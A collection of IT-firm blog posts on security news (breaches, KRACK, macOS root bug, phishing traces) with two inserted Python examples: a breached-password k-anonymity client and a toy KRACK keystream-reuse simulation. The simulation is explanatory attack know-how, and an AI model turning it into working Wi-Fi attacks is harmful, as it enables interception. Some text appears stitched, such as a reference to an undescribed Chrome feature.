The highly popular PDF app, often pre-installed on Windows PCs, has been shown to contain a flaw in which JavaScript embedded in a maliciously crafted PDF can trigger memory corruption when the file is opened, potentially allowing an attacker to run code on the victim’s machine.

Currently rated ‘Critical’ by Adobe’s severity rating system, the bug stems from entirely legitimate functionality: Adobe Reader allows PDFs to contain embedded JavaScript to support forms and other interactive features.

Adobe have responded quickly – publishing the fix to Adobe Security Bulletin alongside patching for 42 other vulnerabilities as of Wednesday 12th February, including one which allowed PDF documents to access hashed passwords.

Adobe Reader is officially 25 years old this year, and although official figures are hard to source, is popularly believed to dominate more than 75% of the PDF software market.

Users can either auto-update their installation or prompt this manually by clicking ‘Help’ > ‘Check for Updates’ within the software itself.

 

For software and security expertise, contact Lineal today.


773 Million Email Addresses Breached Online

Breach-notification website HaveIBeenPwned.com has catalogued the largest collection of breached email addresses to date – nearly 773 million unique addresses.

The 87GB of breached personal data, publicised by Microsoft Regional Director and cybersecurity expert Troy Hunt, was spotted last week via online file-hosting website MEGA under the ominous name “Collection #1”, and has now been removed.

The data itself, believed to be a terrifying aggregation of a large number of previous smaller data breaches, also contained more than 21 million identifiable plain-text passwords.

More than 140 million of the email addresses identified have never been seen before by HaveIBeenPwned.com, suggesting some of the personal data may originate from as yet undiscovered breaches.

Those affected are advised to change their passwords immediately, and to stop reusing passwords across services: criminals feed lists like this into automated ‘credential stuffing’ attacks that try each email-and-password pair against other online services where the user may have registered with identical login credentials.

You can check whether your email address appears among the 773 million at https://haveibeenpwned.com/, and whether a password appears in any known breach via the site’s Pwned Passwords search.
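Both this check and Chrome’s ‘Warn you if passwords are exposed in a data breach’ feature described above face the same problem: how to ask a remote service whether a password is in a breach without sending it the password. The Pwned Passwords service answers that with k-anonymity, and the following added example (our code, not Troy Hunt’s or Google’s) implements the client side: hash the password with SHA-1, send only the first five hex characters, and look for the remaining 35 in the list the server returns. The embedded range reply is constructed for the example (only the second suffix is a real SHA-1 remainder, that of the word ‘password’; the counts and the other suffixes are invented). `fetch_range` does the live lookup against the real API for anyone who wants to run it online.

```python
import hashlib
import urllib.request

PWNED_RANGE_URL = "https://api.pwnedpasswords.com/range/"


def sha1_hex(password: str) -> str:
    return hashlib.sha1(password.encode("utf-8")).hexdigest().upper()


def split_hash(hash_hex: str):
    """First 5 hex characters go to the server; the other 35 never leave the client."""
    return hash_hex[:5], hash_hex[5:]


def parse_range(body: str) -> dict:
    """Parse the server's 'SUFFIX:COUNT' lines into {suffix: count}. With padding
    enabled the server mixes in fake suffixes with count 0, which the lookup below
    treats the same as 'not found'."""
    counts = {}
    for line in body.splitlines():
        line = line.strip()
        if not line:
            continue
        suffix, count = line.split(":", 1)
        counts[suffix.upper()] = int(count)
    return counts


def breach_count(password: str, range_prefix: str, range_body: str) -> int:
    """Number of breaches the password appeared in, given the reply for its prefix."""
    prefix, suffix = split_hash(sha1_hex(password))
    if prefix != range_prefix.upper():
        raise ValueError("range body does not belong to this password's prefix")
    return parse_range(range_body).get(suffix, 0)


def fetch_range(prefix: str) -> str:
    """Live lookup (needs network). Add-Padding asks the server to pad every reply
    to a similar size so the response length does not leak which prefix was queried."""
    req = urllib.request.Request(PWNED_RANGE_URL + prefix,
                                 headers={"Add-Padding": "true", "User-Agent": "breach-check-example"})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode("utf-8")


def is_pwned(password: str) -> int:
    prefix, _ = split_hash(sha1_hex(password))
    return breach_count(password, prefix, fetch_range(prefix))


# Constructed stand-in for the reply to /range/5BAA6. Real replies list several
# hundred suffixes; the counts and first/third suffixes here are invented.
SAMPLE_RANGE_5BAA6 = """\
003D68EB55068C33ACE09247EE4C639306B:3
1E4C9B93F3F0682250B6CF8331B7EE68FD8:3861493
1E8C6E7B8B1B2F9B4A0F1F5C3D2E1A0B9C8:1
"""


if __name__ == "__main__":
    for pw in ("password", "correct horse battery staple"):
        prefix, _ = split_hash(sha1_hex(pw))
        if prefix == "5BAA6":
            print(pw, "->", breach_count(pw, prefix, SAMPLE_RANGE_5BAA6), "breaches (sample data)")
        else:
            print(pw, "-> prefix", prefix, "(run is_pwned() online to check)")
```

The privacy property to note: the server learns a five-character prefix shared by hundreds of passwords, never the password or its full hash, which is why Chrome and password managers can run this check routinely without becoming a password-leak risk themselves.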

For IT support and cybersecurity expertise, contact Lineal about your requirements today.


Microsoft announce end of support for Windows Server 2008

Support and security updates for Microsoft’s Windows Server 2008 and 2008 R2 operating systems will end in January 2020.

Customers operating Windows Server 2008 will then cease to receive security patches and other important system updates.

Around 70% of the world’s server operating systems are Windows based, with Server 2008 one of the most successful versions, still representing more than half of these installations as recently as 2016.

Users of Server 2008 and 2008 R2 have just over 6 months to decide whether to upgrade to a newer version of Windows Server (such as the long-awaited Server 2019, hardware permitting), replace servers with newer models, or migrate those server-based processes to a cloud-based platform, such as Microsoft Azure.

Mainstream support for Server 2008 already ended in January 2015 (itself an extension from July 2013); January 2020 marks the end of Extended Support, and a further extension is unlikely.

As with previous operating systems, enterprise customers will have the option of purchasing Extended Security Updates, sold in yearly increments for up to three years beyond the deadline (to January 2023) and offered free of charge for workloads migrated to Microsoft Azure – but as with other legacy Windows products, at an increasingly high associated cost each year.

Businesses will need to weigh up for how long they can afford to delay upgrading, or depending on the physical server hardware, whether it makes more sense to spurn the licensing costs of upgrading the Windows Server version and go directly to either the cloud, or a new server.

 

For IT infrastructure support and expertise, please contact our team today.


WPA3 Wi-Fi Introduced

The Wi-Fi Alliance has formally announced the introduction of the WPA3 security protocol, the next generation of wireless security to protect routers and networks.

The new security standard follows hot on the heels of last year’s KRACK (Key Reinstallation Attack) against the existing WPA2 standard, which has been in use since 2004.

WPA3, released in ‘Personal’ and ‘Enterprise’ variants (the latter with extra protections), is expected to fix a number of deficiencies in the older Wi-Fi protocol, including:

  • Forward secrecy: captured encrypted traffic cannot be decrypted by a later compromise of the Wi-Fi password – to read data, an attacker must have both the password and the traffic at the point of transmission.
  • Encryption of data will be individualised per device, so that snooping on other devices across open or less secure Wi-Fi networks will be made more difficult.
  • The new SAE (Simultaneous Authentication of Equals) handshake replaces the pre-shared-key exchange, so an attacker can no longer capture a handshake and guess the password offline, dramatically increasing the time cost of brute-forcing or ‘dictionary’ attacks against a password.
  • Smart devices with no screen, including many Internet-of-Things (IoT) devices, will be onboarded from a smartphone (for example by scanning a QR code) during Wi-Fi setup.

To most end-users, the experience of entering a Wi-Fi key will feel virtually identical. WPA3 isn’t expected to actually be implemented until 2019, and is predicted to gradually replace the existing WPA2 standard on all Wi-Fi certified devices. WPA2 will continue to function, but will be steadily phased out.

Nevertheless, expect to see major manufacturers rushing to ensure their own products are stamped with the very latest security ‘WPA3 Ready’ branding.

For networking and cybersecurity expertise, please contact Lineal today.


Top Picks: Best GDPR Resources

Be honest, you’ve read some truly useless things online about GDPR. We all have.

The problem isn’t one of enthusiasm: more and more companies are recognising the impending deadline of the new data protection regulations and acting to implement best practice.

There is, of course, a growing industry of consulting firms and data protection advisers trading on businesses’ lack of expertise and frequently, fear of being left behind. Most organisations begin preparing with a spot of Googling, some light reading, and a bit of browsing online GDPR help articles written by experts.

However, the real experts can’t divulge too much free advice (otherwise why contract their services?), so many of the available articles and blog posts are deliberately vague. The conundrum has already spawned some unfortunate attempts at humour, but doesn’t really help companies attempting to put GDPR-compliant policy in place.

All is not lost: there really is some genuinely useful guidance out there – here are our picks for some of the best GDPR resources:

 

ICO: Eight Practical Steps

ico eight practical GDPR steps

The Information Commissioner’s Office original ‘eight practical steps’ presentation is a series of slides that are exceptionally clear, and can be worked through in stages. A more recent, formal ’12-step’ version also exists, for a more conceptual understanding of the new regulations.

 

GDPR Readiness Assessment from Microsoft

Microsoft GDPR quiz

A little technical at times, this quick quiz is a useful way of thinking further about protection policy, particularly around access control. For further information on how Microsoft can assist with GDPR in the cloud, look for the blue button in the top right hand corner.

 

ICO Helpline

ICO GDPR helpline

The ICO has a little known helpline via which small businesses and charities can consult a member of ICO staff for extra advice – details of which can be found above.

 

IT Governance Compliance Gap Assessment Tool

IT governance GDPR compliance gap assessment tool

Always a strong source of IT expertise and policy, IT Governance have developed a range of ‘Toolkits’ to assist data protection officers and those implementing GDPR within their organisations. These range from the simple £60 compliance gap assessment tool (a handy Excel Spreadsheet you can work through) to more expensive implementation packs and data flow mapping tools.


Why USB drives are terrifying

USB drives are a security nightmare. From losing files, to sharing them inadvertently, or accidentally installing something malicious, these tiny handheld digital storage grenades are a data-protection disaster waiting to happen.

Many people can’t help themselves. Sometimes it’s just so useful to be able to move a file to a separate computer, or carry a copy of that file on a handy keyring.

It’s true that too many operating systems auto-run memory sticks. As users we could perhaps be more careful though – find a USB and it’s tempting to plug it in… a 2016 University study suggested roughly half of those who find a memory stick on the ground will plug it in without thinking.

In particularly data-sensitive environments options are available to either disable PC USB ports, or remove them from a PC entirely. At the very least, businesses preparing for this summer’s new GDPR regulations need to take some sensible USB security precautions:

 

1. Be strict.

Ask yourself whether it’s entirely necessary to put this file on a memory stick, and be harsh about what files you copy. Memory sticks now hold terabytes of data, and are too easy to drop, or leave on the train.

GDPR is naturally concerned with sensitive personal data, and not your supermarket shopping list. Nobody ever intends to lose a file full of personal data, so you should think twice before putting the former on a USB drive, while the latter is probably OK.

 

2. Don’t allow easy access to your network.

USB-borne malware comes in a variety of forms: from cheap spyware purchased online, to the fascinatingly complex (and widely attributed to Western governments) ‘Stuxnet’ worm, discovered in 2010, which famously sabotaged the Iranian nuclear programme after being carried in on USB drives.

The best antivirus software (for example Lineal’s recommended ESET antivirus) automatically offers to scan a newly connected memory stick for malicious software before the user accesses the files. This only takes a few seconds, but it is strongly advised to let your antivirus act as gatekeeper for a USB stick, as you would for your emails or web browsing. One caveat: a file scan only catches malware stored as files, so a device that announces itself to the PC as a keyboard and types commands (the so-called ‘BadUSB’ technique) is not something a scan of the drive’s contents will detect.


 

3. Sharing is not caring

Sharing files via memory sticks is not sensible, not least because you’re forced to share the whole contents, including the ability to duplicate files.

You can’t be certain what any given person will do with the USB drive or its data, or what the person giving you a memory stick might have done with it previously, so it’s safer to confine USB drives to a specific individual.

 

4. Get something better

The world of IT is full of better solutions, including Apple’s useful ‘Airdrop’ function which allows direct, localised file sharing over WiFi. For company-wide systems, numerous excellent cloud-based file storage and sharing platforms are available. Microsoft’s excellent OneDrive platform is easy to use from any device, and allows businesses to share files online via the cloud, with customisable permissions to control who has access to the data at any time.

A USB drive should not be necessary to complete routine IT tasks. Thank goodness.


Apple fixes MacOS Root Password security blunder

Apple have issued a fix for yesterday’s severe security alert, after it emerged that the tech giant’s macOS High Sierra operating system would grant access to the root user account without a password.

The story caused alarm around the world, as Mac users discovered full administrator control of their device was available to anyone within reach of the keyboard.

Discovered by Turkish developer Lemi Orhan Ergin, who tweeted it to Apple Support, the widely publicised fault is believed to affect all Macs (such as the iMac and MacBook ranges) running macOS High Sierra 10.13.1 or newer.

Mr Ergin has since published an article on Medium defending his decision to flag the vulnerability publicly, arguing that although the flaw had been public knowledge on the Apple Developer Forum since 13th November, Apple had failed to resolve the issue.

Yesterday Lineal published guidance to all our Mac clients, advising caution over the physical security of Apple hardware, and explaining the need for users to set a new root password to temporarily secure their Mac while Apple worked on a security fix.

Security update 2017-001 is now available via the App Store, and Apple have even taken the almost unprecedented step of forcing 10.13.1 devices to update automatically.


The root cause was a logic flaw in High Sierra’s credential validation: the root account ships disabled with no password, and an attempt to authenticate as root with an empty password enabled the account with that empty password, so the next attempt succeeded. That a check this fundamental could fail once again calls into question the recent competence of Apple’s historically excellent quality control and product testing, and may slow the adoption of the firm’s latest flagship operating system. The widespread media publicity surrounding the story is also likely to undermine Apple’s long-held reputation for security on Mac devices.

Apple issued an apology, stating ‘We greatly regret this error and apologise to all Mac users.’

 

For Apple assistance and support, contact Lineal’s IT team today.


Technology firms rush to fix WPA2 KRACK

Technology firms are urgently issuing fixes for the WPA2 KRACK (Key Reinstallation Attack) thought to compromise the WPA2 encryption used in most WiFi routers and other wirelessly enabled devices.

The exploit, discovered and published by Mathy Vanhoef, a Belgian security researcher at imec-DistriNet, KU Leuven, has caused serious alarm amongst cybersecurity professionals due to the widespread use of WPA2 across millions of items of networked hardware around the world.

Vanhoef’s website, detailing how KRACK works, demonstrates on video how an Android smartphone can be tricked into reinstalling an encryption key that is already in use, by replaying message 3 of WPA2’s four-way handshake. Reinstalling the key resets the packet number (the per-packet nonce) and replay counter, so the same keystream is used twice and data transmitted from the device can be decrypted; on Android 6.0 and some Linux versions of wpa_supplicant the key is actually replaced with an all-zero key, making decryption trivial.
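Why a reset nonce is so damaging is easier to see in code than in prose. The following is an added example (ours, not Vanhoef’s proof-of-concept): a toy Wi-Fi station that, like a vulnerable client, reinstalls the key and resets its packet number whenever message 3 arrives. The keystream generator is a stand-in (SHA-256 over key, nonce and block counter, so the example runs on the standard library) for the AES-CTR keystream CCMP really uses; the consequence of reusing a (key, nonce) pair is identical. The PTK and the two ‘frames’ are constructed for the example, and the attacker is assumed to know the first plaintext, as in practice they often do from predictable protocol messages.

```python
import hashlib


def keystream(key: bytes, nonce: int, length: int) -> bytes:
    """Toy counter-mode keystream: SHA-256(key || nonce || block counter).
    CCMP uses AES-CTR keyed by the PTK with the packet number as nonce; what
    matters here is only that the keystream is a function of (key, nonce)."""
    out = b""
    block = 0
    while len(out) < length:
        out += hashlib.sha256(key + nonce.to_bytes(6, "big") + block.to_bytes(4, "big")).digest()
        block += 1
    return out[:length]


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def encrypt(key: bytes, nonce: int, plaintext: bytes) -> bytes:
    return xor_bytes(plaintext, keystream(key, nonce, len(plaintext)))


class Station:
    """Wi-Fi client. install_key is what runs on 4-way handshake message 3; the
    vulnerable behaviour is that a retransmitted message 3 reinstalls the key and
    resets the packet number (nonce) to its initial value."""

    def __init__(self, zero_key_on_reinstall: bool = False):
        self.key = None
        self.nonce = 0
        self.zero_key_on_reinstall = zero_key_on_reinstall

    def install_key(self, ptk: bytes):
        if self.key is not None and self.zero_key_on_reinstall:
            # Android 6.0 / wpa_supplicant 2.4-2.5 behaviour: the key was wiped from
            # memory after first installation, so the reinstall installs all zeros
            ptk = bytes(len(ptk))
        self.key = ptk
        self.nonce = 1          # packet number reset: this is the bug

    def send(self, plaintext: bytes):
        frame = (self.nonce, encrypt(self.key, self.nonce, plaintext))
        self.nonce += 1
        return frame


PTK = hashlib.sha256(b"constructed PTK for the example").digest()   # constructed
MSG1 = b"GET /account/balance HTTP/1.1\r\nHost: bank.example\r\n"  # assumed known to attacker
MSG2 = b"POST /transfer amount=1000 to=attacker"                  # what the attacker wants


def keystream_reuse_attack() -> bytes:
    """Attacker replays message 3 between two frames. Both frames now share
    (key, nonce), so XOR of the ciphertexts equals XOR of the plaintexts, and a
    known first plaintext (a crib) reveals the second."""
    sta = Station()
    sta.install_key(PTK)
    n1, c1 = sta.send(MSG1)
    sta.install_key(PTK)            # replayed message 3
    n2, c2 = sta.send(MSG2)
    assert n1 == n2                 # same nonce, hence same keystream
    return xor_bytes(xor_bytes(c1, c2), MSG1)


def zero_key_attack() -> bytes:
    """Android 6.0 variant: after the reinstall the key is all zeros, so the
    attacker decrypts directly without needing any known plaintext."""
    sta = Station(zero_key_on_reinstall=True)
    sta.install_key(PTK)
    sta.send(MSG1)
    sta.install_key(PTK)            # replayed message 3 -> all-zero key
    nonce, ct = sta.send(MSG2)
    return encrypt(bytes(len(PTK)), nonce, ct)


if __name__ == "__main__":
    print(keystream_reuse_attack())
    print(zero_key_attack())
```

The fix vendors shipped is exactly what the `install_key` comment points at: a key that is already installed must not be installed again, so a replayed message 3 no longer touches the nonce. Note also that none of this breaks TLS; traffic inside an HTTPS session is still protected, which is why the advice below to avoid sensitive tasks on public networks matters most for unencrypted services.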

Security guidance remains to continue using WPA2 (rather than reverting to an older encryption standard) and to install the latest WPA2 KRACK security updates from manufacturers as soon as they are available.

A number of key technology vendors were notified in August, giving them some time to prepare. Microsoft are reported to have adjusted “how Windows verifies windows group key handshakes” to fix the issue. Apple and Android are yet to specify exactly when patches will be available, although both are understood to be working on a secure fix to be made available in coming weeks. The more responsive hardware developers, including Cisco and Ubiquiti, yesterday began issuing guidance and new firmware for their wireless equipment.

The Wi-Fi Alliance, the international organisation dedicated to developing Wi-Fi technology, have essentially argued that there is no need to panic. There is no evidence of the extremely serious hack being deployed outside test conditions (yet) – although it’s probably only a matter of time before someone attempts to do so. Because Wi-Fi relies on physical range, it’s likely this could target public Wi-Fi and other easily accessible networks. For this reason, users are (as always) reminded not to use public networks for sensitive tasks, such as online banking.

It’s clear from the increased publicity surrounding the discovery that major vendors of network equipment will be under pressure to issue the required WPA2 KRACK security patches.

However, the underlying vulnerability also threatens a wide range of wirelessly connected internet-of-things (IOT) devices – including everything from CCTV to smart-fridges – such that it’s unclear just how widespread this latest security flaw will actually prove.

For IT support and cybersecurity expertise: get in touch with Lineal today.


Fake hardware seized by Police

Fake hardware has been seized by a City of London Police intellectual property crimes unit, following a recent raid in Kent.

The counterfeit networking equipment, worth at least £300,000, is believed to have been manufactured by organised criminals imitating the high-quality hardware of IT giant Cisco.

Small form-factor pluggable transceivers were recovered, which are used to convert optical data to conventional electrical signals as part of fibre-optic networks. 

Police believe the risks of organised criminal gangs being caught transporting imitation IT hardware are lower than for drugs or firearms, and that only technically-trained specialists would be able to distinguish counterfeit technology from the real thing.

Although no evidence of cyber-security intrusions has so far been found, engineers from Cisco stressed that small items like these could easily find their way into a business or public-sector supply chain, become mixed up with genuine network hardware, or fail due to low-quality manufacture.

Customers who suspect they may have encountered counterfeit items should isolate the hardware in question from other devices and report their suspicions to IT staff.

 

Lineal are a Cisco Select Partner – for hardware advice and support, please contact our team today: 01271 375999


Anti-Virus Politics: Kaspersky offers to hand over source-code to US Government

In a surprise move, Eugene Kaspersky has publicly offered to give the US Government access to the source code of its security software in a bid for transparency.

The offer is the latest development in an ongoing dance between the Russian IT security company and the US Government, after the Senate Armed Services Committee threatened to ‘blacklist’ the software company from applying for US defence contracts over the risk of influence from the Russian Government.

In a sensationalist piece released by Bloomberg, journalists claim the Moscow-based firm hold regular meetings with Russian Ministry of Defence and FSB agents, and that Eugene Kaspersky has even personally met with Russian intelligence officials in a ‘banya’ sauna.

Modern business antivirus software typically collects background telemetry from customer machines to reinforce a real-time intelligence effort against the latest threats on the internet – which is precisely why a vendor’s trustworthiness matters – yet many users are unaware of what their antivirus sends back, or whether it understands the latest threats.

Kaspersky argues the headlines are part of a ‘witch-hunt’ by Washington; industry analysts have acknowledged the heightened scrutiny of Kaspersky by US authorities has closely followed their recent uncovering of NSA ‘Equation’ hacking tools as a part of work against recent ransomware outbreaks, but may also represent the beginnings of a smear campaign by domestic US security providers.

Speaking to the Associated Press, the security provider implied it had already rejected government requests to undertake offensive cyberattacks rather than defensive software development – not necessarily requested by the Russian government.

Against the background of press-interest in alleged Russian hacking stories, it appears the dramatic feud has some distance left to run.

 

For IT security advice and expertise – contact Lineal’s team today.


Windows XP Antivirus? Bitdefender to the rescue.

Around 6% of PCs are estimated to still be running out of date, unsupported operating systems like Microsoft Windows XP. Here at Lineal we’ve long advocated keeping operating systems up-to-date and secure against the latest threats.

But in certain circumstances that’s not always so easy: legacy XP machines are often connected to third-party equipment (e.g. manufacturing hardware) using cable connections or drivers that are now difficult to obtain. The external hardware can’t be replaced as readily as the connected PC for both cost and practical reasons, so the ageing PC (with a lack of XP antivirus) creates an in-built security vulnerability for a business’s whole network.

Users caught by this conundrum can find a solution in Bitdefender’s Security for XP and Vista – a version of Bitdefender’s award-winning security built to be backwards compatible with older PCs, providing ongoing protection against the latest threats for legacy hardware.

Security for XP and Vista is available for Windows XP Service Pack 3 and Vista Service Pack 2 operating systems, and also integrates with older software likely to be found on such machines, such as Outlook 2007, Yahoo Messenger 9, Internet Explorer 8 and other common web browsers of the same generation.

For those concerned that a trusty old machine and lack of XP antivirus could be the very weakest point in their security, Bitdefender could be a shrewd choice indeed.

For IT Security advice and support, contact Lineal today.


Lineal become a Bitdefender Partner

Lineal Software have been certified as a Bitdefender Partner for Bitdefender security software.

Bitdefender’s range of security products are used on millions of devices worldwide and the provider ranks highly in independent Virus Bulletin VB100 tests, as well as winning numerous quality awards for software innovation.

A wide variety of both Bitdefender Home and Business security products are available, across platforms including Windows, Mac and Android and more.

Lineal’s Head of Technical Services Matt Norris explained: ‘We’re very pleased to qualify as Bronze Bitdefender partners – this qualification only expands the range of IT security options which Lineal can offer to our customers and we look forward to delivering a high quality service for those interested in using Bitdefender.’

‘There are only a handful of Bitdefender partners in the South West, and Lineal are delighted to be one of them.’

 

For IT security advice and support, contact Lineal today.


Fake DVLA Emails: Tracing a Trojan Scam

Continuing our recent series on email phishing trickery including fake invoices and Apple ID theft, this week we discovered a new scam involving a fake communication claiming to be from the Driver & Vehicle Licensing Agency (DVLA).

You haven’t sent them your vehicle details: but never fear, enter them below and avoid a hefty ‘1000 GBP’ fine. Never mind that your garage should have organised a V5 document for you, just click the link and type in your details. This couldn’t be a scam? Right?

We set Lineal’s security trainee Lewis on the fake DVLA emails case, who found that the email links to a private (non Gov.uk) web page with an extensive bit of PHP code running in the background. A classic Trojan, this web page invited you to download your casefile – and likely something dangerous along with it.


Despite poor grammar, the format matched a GOV.UK page quite closely and the ‘official’ nature of the styling might easily have tricked unsuspecting motorists.

Avoiding the page itself, Lewis completed an HTTPS lookup on the domain hosting the fake web page – and found two servers running the same scam. The email itself appeared to be routed via the USA, in an effort to mask the attackers’ identity.

Tracing both IPs separately led back to the same address in Germany, registered under two different names which could either be part of an organisation or (more likely) both assumed identities stolen from others who had fallen victim to the scam.

German privacy law prevents Google StreetView from being completed across most of the country, so an aerial view of an unknown industrial building on the outskirts of Lippstadt was as close as we could get to locating the source of the suspicious email itself.

Clearly a sophisticated operation, fake DVLA emails like this highlight the growing technical ability of online scammers and the need for solid IT security precautions.

 

For IT Security advice and support, contact Lineal today: 01271 375999


Hunting Down Email Scammers

 

Here at Lineal we check a lot of suspicious emails – containing everything from fake invoices, dodgy downloads and even new ‘Zero-day’ ransomware threats not yet seen elsewhere on the internet. Cyber-security is a rapidly developing battlefield.

Last week our security trainee from Petroc, Lewis, received a fairly typical ‘Phishing’ email – designed to look like an official request for information in order to trick recipients into handing over personal details. Keyboard at the ready, he decided to go on an investigation – hunting down email scammers.

‘Your Apple ID has been suspended’ read the headline, but never fear, you can reset your account by typing in your private details via ‘Appl.e.com’. It may sound like an obvious scam, but the written quality of the email was high, and Verizon estimates that more than 25% of Phishing emails are not only opened, but clicked on by unsuspecting victims.

The email link itself looked suspicious, so Lewis stripped the exact page link back to its original domain as our first clue. A quick HTTP lookup found the IP address of a Linux based server with several open ports.

The scammers themselves were careful – expanding the email header shows an encrypted code in place of an email reference.

Online tools like GeoTool suggested the server sending the email had been French (although mapping this is an imprecise science – it suggested the Parisian machine was sitting at the bottom of the river Seine.) Nevertheless this gave us a country of origin and also a more accurate address.

Here we hit a problem: the address listed related to a French cloud hosting provider’s company office building in Roubaix, near the city of Lille on the border between France and Belgium. The company itself appears entirely legitimate, so it’s likely a server there has been hijacked or otherwise used inappropriately by a customer of the provider.

A reverse DNS lookup via an online US Security tool suggested the hosted domain name’s registered contact person was based in an apartment building in district 56121, Thessaloniki, Greece, and even listed a gmail address and phone number for the named contact (redacted.)

Had we wanted to, there’s an opportunity here for mischief, but here we decided to end our search – with sufficiently detailed information to report to customer services of the French hosting provider whose server had been misused to distribute the email.

Although it’s likely the original source had been found, it’s possible the Greek client registering the domain name was themselves a victim of the Phishing email or a similar scam.

As a case study, Lewis’ virtual chase across Europe hunting down email scammers highlights how every business is at risk from a globalised world of threats – anyone can be struck by a dangerous email from anywhere, and even the most local businesses need to take precautions.

 

For IT Security advice and support – contact Lineal today.


2017: Be Prepared


With data security making national news headlines, 2017 is only likely to put increasing pressure on businesses of all sizes to take sensible precautions.

But with IT moving so fast, what innovations are likely to lead the way through 2017? Exactly what sensible precautions will most tech-savvy companies be taking?

 

Cloud is good…

The worldwide push for ever more cloud-based systems appears to be unstoppable. A recent report from Synergy Research Group has suggested the global market for cloud computing grew by 25% to September 2016, reaching a staggering $148 billion in value.

It’s hard to see this not continuing, with companies relying on the convenience and automation of stashing growing quantities of off-site backups in the cloud – using services like Office 365 as their private vault. As we’ve covered before: holding assets like email in the cloud actually gives you better protection than most people’s private server.

 

…But Hybrid Cloud is better still.

But 2017’s smartest will be looking further ahead to Hybrid Cloud systems. As IT Pro recently noted, many companies report using more than 5 backup systems, but have no planning for speed of recovery should that data actually be needed urgently during 2017.

Getting all that data back may present a problem if your organisation is large, meaning hybrid on-site/cloud services like Lineal’s Disaster Recovery Service are likely to become the most flexible middle option. Keeping both a synchronised backup on-site, and a copy with a relatively local cloud service, leaves even the most vulnerable business with the maximum number of options.

 

Change your passwords

If you don’t already change passwords regularly, the security benefits cannot be overstated. Stolen data can often be circulated on the internet many times, so changing passwords regularly not only keeps your business secure, but helps prevent repeat data theft from being profitable.

Whilst everyone still has a ‘New Year’ mindset and is prepared to accept a little change, it’s worth updating those passwords company wide. Remember to use a variety of different characters and choose something only you would ever guess.

 

Have a 2017 Plan A… and a Plan B

Ransomware increasingly appears to be the organised criminal world’s cyber-weapon of choice and shows no sign of abating; expect to see more big UK high-street names get compromised this year by malicious emails.

Antivirus companies may include ever more sophisticated heuristics to intercept malicious downloads before they begin encrypting your files, but ultimately only safe backups will ensure you can always restore to a clean set of data. Every firm should have a ‘Plan B’ for how to carry this out.

 

It’s all about Recovery Time

Expect to see Disaster Recovery (not just back-up and contingency) become a by-word for preparedness, with companies and organisations in every sector being judged not just by their number of backups, but by their costly hours of down-time.

So if nothing else, start 2017 with an old piece of technology: a pen and paper. Work out what your business’ data recovery plan actually is, and how long it will take – should the very worst happen.

 

Lineal can provide a range of IT security and business continuity solutions: contact our team today.


Microsoft opens new UK Data Centres


Microsoft’s Office 365 Team have announced the availability of multiple UK data centres for customer data.

The move follows increasingly strict rules on data compliance in the financial, security, health and public sectors – with more cloud IT users looking to ensure their data remains safely located in the UK.

Prospective customers considering the implications of Office 365 are able to view the locations of Microsoft’s UK data centres with this online ‘Where Is My Data?’ map, which now displays both the additional data centres and the Microsoft cloud services they support, in both London and Durham, with a third site anticipated for Cardiff.

Office365 and Azure Users will also have the ability to ‘re-locate’ their data from regional data centres (in most cases based within mainland Europe) to the new UK service.

In addition to the security and legal advantages for protecting sensitive data, cloud users of Office 365 are likely to benefit from lower costs, online backups and collaborative, remote access to files.

For now, the ability to re-locate Office365 or Azure data to the UK is likely to be restricted, with priority expected to be given to high-profile UK public sector customers including NHS Trusts and the Ministry of Defence – the latter mirroring many customers’ belated move to the cloud, upgrading legacy on-site systems in use since 2005.

The new infrastructure has been widely praised, with Microsoft clearly investing heavily in addressing the doubts many have about moving their IT to the cloud; reducing Office365 downtime to just 4 hours per year, and now re-locating data within country of origin for compliance with a high standard of data protection.

 

Contact Lineal for advice on moving to the cloud, or for a free trial of Microsoft Office 365 Business Premium, click here.

 


4 Smartphone security threats you need to avoid:


We increasingly live in a mobile dominated world in which Smartphone sales have skyrocketed whilst traditional PC sales have stalled. With portable devices likely to be the future of many people’s IT use – we’ve put together a few of the main smartphone security threats you need to be aware of.

 

  • Mobile Phishing & Fake Apps

Phishing websites which pretend to be your bank in order to get your personal or financial details have been around for many years, but few people imagine that this is also a big risk on their smartphone.

Fake apps are the most obvious modern incarnation of this scam. IT security specialist ESET recently showed that a popular app like Prisma spawns multiple fakes online, downloaded unwittingly over 1.5 million times before being pulled from Google Play, with many containing harmful malware which attempt to steal personal information.

Don’t attempt to download an anticipated app before its official release date, as it’s likely you’ll be downloading a fake. Avoid downloading apps from unknown third-party websites, check the comments for warnings from other users, and invest in mobile antivirus to intercept downloaded threats to your smartphone security.

 

  • Old-fashioned Theft

In addition to fitting in your pocket, your phone contains a staggering amount of personal information about you which makes theft a real danger – everything including your personal details and those of friends/family, your emails, GPS coordinates of places you regularly visit and more: all stored on the device.

Home Office research suggests iPhones are the device most likely to be stolen – perhaps reflecting the Apple smartphone’s high value, quality and distinctive branding.

In addition to setting numeric pin codes on every device to prevent the danger of theft, tracking and lifesaving wiping tools like are strongly advised.

 

  • Public Wi-Fi Networks

With the proliferation of portable devices, many businesses, particularly in retail, offer public Wi-Fi hotspots to customers.

The problem with this is that you’re sharing a network with… whom? Terrifying free tools like [Redacted – obviously] and [Redacted] allow anyone on a shared public network to view insecure websites you visit, and snoop on any keystroke you type.

Not every public Wi-Fi network is a security nightmare, but it’s sensible to avoid using public Wi-Fi to do anything sensitive, such as online banking. A 4G data connection or simple telephone banking is the easiest alternative if you’re on a mobile phone, and likely to be more secure than a public Wi-Fi Network.

It should probably go without saying that you shouldn’t connect to entirely unrecognised, unsecured or unknown Wi-Fi networks either. For obvious reasons.

 

  • Being Personally Targeted

The problem with the wider shift to portable devices is that we carry our workplace into the outside world. Many of us expect complete access to our business data on our smartphone (as we would on our PC) wherever we are.

But carrying your work phone outside work means you’re also outside the protection of in-house IT security software and firewalls.

A simple phishing email can easily be targeted to you outside working hours when you’re ‘off-guard’, and the potential loss of confidential company data could be devastating.

Of course, many of the best IT security software providers now offer Android & iOS smartphone versions of their antivirus software – so why not extend your business’ IT security to your smartphone?

 

For IT support and security guidance – contact Lineal today.


Lineal at 50th North Devon Show 2016


Team Lineal recently attended the 50th annual North Devon Show, setting up alongside a range of local businesses in the show’s ‘Arcade’ tent at the Umberleigh show ground.

Visitors to our stall at the largest one day event in North Devon received free 30-day trials of Microsoft Office 365 (along with many free sweets!) to celebrate Lineal recently becoming a Microsoft Gold Partner. We also took the opportunity to showcase our SQLWorks business software, ShoreTel Unified Communications systems, ESET security software, and much much more.

